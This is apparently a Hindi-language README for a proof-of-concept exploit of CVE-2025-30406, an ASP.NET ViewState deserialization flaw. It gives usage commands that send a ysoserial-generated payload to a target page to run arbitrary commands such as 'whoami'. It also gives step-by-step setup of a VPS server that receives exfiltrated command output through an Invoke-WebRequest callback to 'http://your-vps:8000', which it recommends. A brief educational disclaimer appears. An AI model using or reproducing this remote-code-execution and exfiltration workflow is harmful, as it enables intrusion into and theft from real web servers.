
CVE-2025-30406 ViewState Exploit PoC
यह एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) स्क्रिप्ट है जो ASP.NET अनुप्रयोगों में CVE-2025-30406 के लिए ViewState डिसीरियलाइज़ेशन शोषण प्रदर्शित करती है। यह एक दुर्भावनापूर्ण ViewState पेलोड उत्पन्न करने के लिए ysoserial का उपयोग करती है और इसे प्रदान किए गए कमांड को निष्पादित करने के लिए उपयोगकर्ता-निर्दिष्ट URL पर भेजती है। सर्वोत्तम परिणामों के लिए, कमांड आउटपुट को VPS पर चल रहे एक कस्टम HTTP सर्वर (server.py) पर एक्सफ़िलट्रेट किया जा सकता है, जो परिणामों को टाइमस्टैम्प, हरे प्रॉम्प्ट और सफेद आउटपुट टेक्स्ट के साथ स्टाइलिश प्रारूप में प्रदर्शित करता है। यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग केवल उन सिस्टमों पर किया जाना चाहिए जहाँ आपके पास सुरक्षा परीक्षण करने की स्पष्ट अनुमति हो। अनधिकृत उपयोग अवैध और अनैतिक है।
exploit.py: ViewState पेलोड उत्पन्न करने और भेजने के लिए मुख्य PoC स्क्रिप्ट।server.py: एक्सफ़िलट्रेटेड कमांड आउटपुट को स्टाइलिश प्रारूप में प्राप्त करने और प्रदर्शित करने के लिए एक HTTP सर्वर।README.md: यह फ़ाइल, सेटअप और उपयोग निर्देशों के साथ।requests लाइब्रेरी (pip install requests)server.py चलाने के लिए एक VPS या सर्वर (एक्सफ़िलट्रेशन के लिए अनुशंसित)git clone https://github.com/yourusername/cve-2025-30406-poc.git
cd cve-2025-30406-poc
pip install requests
exploit.py के समान निर्देशिका में रखें या इसका पथ निर्दिष्ट करें:
एक्सफ़िलट्रेटेड कमांड आउटपुट को स्टाइलिश प्रारूप में प्राप्त करने के लिए, VPS पर server.py चलाएँ:
server.py को अपने VPS पर कॉपी करें (जैसे, scp के माध्यम से):
scp server.py user@your-vps-ip:/home/user/
sudo apt update && sudo apt install python3 python3-pip
python3 server.py
sudo ufw allow 8000
http://your-vps-ip:8000) exploit.py में -e फ़्लैग के साथ उपयोग के लिए।exploit.py को आवश्यक तर्कों के साथ चलाएँ। -e फ़्लैग वैकल्पिक है लेकिन स्टाइलिश प्रदर्शन के लिए कमांड आउटपुट को server.py पर एक्सफ़िलट्रेट करने हेतु अत्यधिक अनुशंसित है।
python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]
-u, --url: लक्ष्य URL (जैसे, http://target.com/page.aspx) [आवश्यक]-c, --command: निष्पादित करने के लिए कमांड (जैसे, whoami) [आवश्यक]-y, --ysoserial: ysoserial एक्ज़ीक्यूटेबल का पथ (डिफ़ॉल्ट: ./ysoserial.exe) [वैकल्पिक]-e, --exfil: कमांड आउटपुट एक्सफ़िलट्रेट करने के लिए कॉलबैक URL (जैसे, http://your-vps:8000) [वैकल्पिक]python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
server.py चला रहे VPS पर एक्सफ़िलट्रेशन के साथ चलाएँ (अनुशंसित):
python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000
अपने VPS या स्थानीय मशीन पर, एक्सफ़िलट्रेटेड आउटपुट प्राप्त करने के लिए HTTP सर्वर प्रारंभ करें:
python3 server.py
सर्वर कमांड आउटपुट को टाइमस्टैम्प, हरे $ प्रॉम्प्ट और पठनीयता के लिए सफेद टेक्स्ट के साथ प्रदर्शित करेगा।
exploit.py):
-e प्रदान किया गया है, तो कमांड को आउटपुट कैप्चर करने और उसे Invoke-WebRequest के माध्यम से कॉलबैक URL पर भेजने के लिए लपेटा जाता है।__VIEWSTATE पैरामीटर में एम्बेड करके लक्ष्य URL पर भेजता है।server.py):
$ प्रॉम्प्ट और सफेद आउटपुट टेक्स्ट के साथ प्रिंट करता है।-e कॉलबैक URL हेतु सार्वजनिक रूप से सुलभ सर्वर की आवश्यकता होती है।यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।
प्रश्नों या फ़ीडबैक के लिए, कृपया इस रिपॉजिटरी पर एक issue खोलें।